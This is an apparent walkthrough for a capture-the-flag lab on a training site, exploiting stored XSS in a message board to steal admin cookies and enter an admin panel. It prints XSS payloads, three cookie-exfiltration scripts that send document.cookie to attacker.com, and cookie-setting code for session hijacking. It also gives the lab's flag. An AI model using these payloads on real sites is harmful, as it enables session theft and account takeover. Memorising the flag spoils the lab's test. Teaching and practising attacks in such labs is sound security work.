Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
This challenge implements a stored XSS vulnerability with a unique twist: when your payload contains document.cookie
, the application automatically replaces it with admin cookie values to simulate an admin visiting your malicious message. The key is to steal these replaced admin cookies to gain access to the admin panel.
<target-ip>
to access the community message board<target-ip>/admin
(access denied without privileges)Name: Test
Message: <script>alert('XSS Confirmed')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<script>
// The application will replace document.cookie with admin cookies
var stolenCookies = document.cookie;
// Display the stolen admin cookies
alert('Stolen admin cookies: ' + stolenCookies);
</script>
In actual attacks, you cannot see the admin's cookies directly. Instead, you must:
Real-World Cookie Theft Payloads:
// Method 1: Image-based exfiltration
<script>
var cookies = document.cookie;
var img = new Image();
img.src = 'http://attacker.com/steal?data=' + encodeURIComponent(cookies);
</script>
// Method 2: Fetch API exfiltration
<script>
fetch('http://attacker.com/steal', {
method: 'POST',
body: 'cookies=' + encodeURIComponent(document.cookie)
});
</script>
// Method 3: Form submission exfiltration
<script>
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://attacker.com/steal';
var input = document.createElement('input');
input.name = 'stolen_cookies';
input.value = document.cookie;
form.appendChild(input);
document.body.appendChild(form);
form.submit();
</script>
Why Real Attacks Require Patience: Unlike this educational simulation, real XSS attacks require waiting for legitimate admin users to visit the compromised page. The cookies are stolen when the admin's browser executes your malicious script, sending their session data to your collection server.
// Replace with actual cookie values from Step 3
document.cookie = 'admin_session=true; path=/;';
document.cookie = 'admin_session_token_[64-hex-value]=active; path=/;';
document.cookie = 'sessionid=admin_12345; path=/;';
<target-ip>/admin
a609f3b4-45a7-4089-bea4-e2f115d40dce
// Example stolen cookie format:
admin_session=true; admin_session_token_[64-hex]=active; sessionid=admin_12345
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.